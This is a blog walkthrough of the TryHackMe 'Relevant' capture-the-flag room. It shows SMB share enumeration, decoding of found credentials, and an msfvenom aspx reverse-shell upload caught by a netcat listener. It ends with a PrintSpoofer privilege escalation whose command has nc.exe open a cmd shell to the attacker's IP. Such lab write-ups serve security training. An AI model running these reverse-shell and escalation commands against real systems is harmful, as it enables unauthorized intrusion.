TryHackMe: Relevant Made Easy (Walkthrough & Video)

5/5 - (2 votes)

How I Hacked a Win Server Using Printspoofer

TryHackMe: Relevant Made Easy (Walkthrough)

CHALLENGE OVERVIEW

  • Link: https://tryhackme.com/room/relevant
  • Difficulty: Medium
  • Target: User/root flags
  • Highlight: Using printspoofer to privilege escalate to the admin account
  • Tools used: nmap, dirb, smbmap, base64, msfvenom, netcat
  • Tags: Security, Security Misconfiguration, Pentest, blackbox, pentest

BACKGROUND

This is another blackbox-style CTF challenge.

👉 Recommended: TryHackMe Daily Bugle Made Easy – A Helpful Walkthrough with Hacking Video

We go into the pentest without any prior knowledge of our target. We are only provided the IP address and will need to do our own enumeration to learn more about our target, and then we’ll move on to planning and executing our attack.

ENUMERATION/RECON

Here are some of the most notable results from our initial enumeration scans.

Nmap results:

It is curious that there are two open ports running HTTP servers. We would be wise to follow up on this finding with dirb scans on both ports to check for hidden directories.

The name Relevant also pops up on port 3389. This may be important, considering the name of this challenge.

Smbmap

Using smbmap we are able to extract four shares and information about permissions.

We’ll proceed by logging into the nt4wrksv share because it has read and write permissions and may not be password protected.

We found a passwords.txt file here that holds two encrypted strings. Let’s try using base64 to decrypt these strings.

We can use the command:

echo "<encoded string>" | base64 -d

We have decrypted two password:username combos from these strings. These may come in handy later on in our hack.

Another interesting finding is that the smbshare at //10.10.5.113/nt4wrksv is directly connected to the smb share with which we have write access privileges. This means that we can use this to throw a reverse shell.

We’ll use the rev.aspx file that I previously created with msfvenom.

We are choosing aspx for the format because we know that our server is running on Microsoft IIs httpd, and aspx files are built to run on this kind of server.

You can build your own rev.aspx for spawning a reverse windows shell with the following command:

msfvenom -p windows/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx

UPLOAD THE REV.ASPX PAYLOAD

After uploading the rev.aspx payload via the smbclient at //<targetIP>/nt4wrksv using the command put <filename>, we’ll set up a netcat listener:

nc -lnvp 3333

We can trigger the revshell now by loading in our browser:

http://<targetIP>/nt4wrksv/rev.aspx

And now we have our initial foothold!

Next, let’s do an Nmap –script vuln scan to drill in on more details about potential vulnerabilities on the target machine.

Our nmap script vuln scan turns up ms17-010 indicating a vulnerability to the famous Eternal Blue exploit on our target machine.

INITIAL FOOTHOLD

Running whoami /priv reveals SeImpersonatePrivilege is enabled. Let’s keep this in mind as a possible plan B for our attack vector. We might be able to use the printspoofer exploit.

LOCAL RECON

c:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fd—--------omitted—-------------45}

PRIVILEGE ESCALATION

Our nmap –script vuln scan revealed a vulnerability to Eternal blue (ms17-010).

I tried setting up the Python script from exploit-db and wasn’t successful. If this was a real pentest, I would definitely do further investigation into the exploit and try using the metasploit eternal blue module. For now, let’s go to plan B – the printspoofer exploit.

PLAN B – USING PRINTSPOOFER TO GAIN ADMINISTRATIVE AUTHORITY

👉 Link: https://github.com/itm4n/PrintSpoofer

.\PrintSpoofer.exe -c ".\nc.exe 10.6.2.23 3333 -e cmd"

And now we are the Administrator!

POST-EXPLOITATION

Let’s grab the root flag from the usual directory.

FINAL THOUGHTS

There are probably several ways to solve this box, but this is the one that seemed most natural to me.

Some information we learned during enumeration ended up being irrelevant to our attack vector. I guess the lesson here is to look for viable ways forward and not to dwell for too long on extra information, such as the encrypted passwords or the eternal blue vulnerability that didn’t seem to work for privilege escalation.

Again, the simpler solution proved to be the better solution.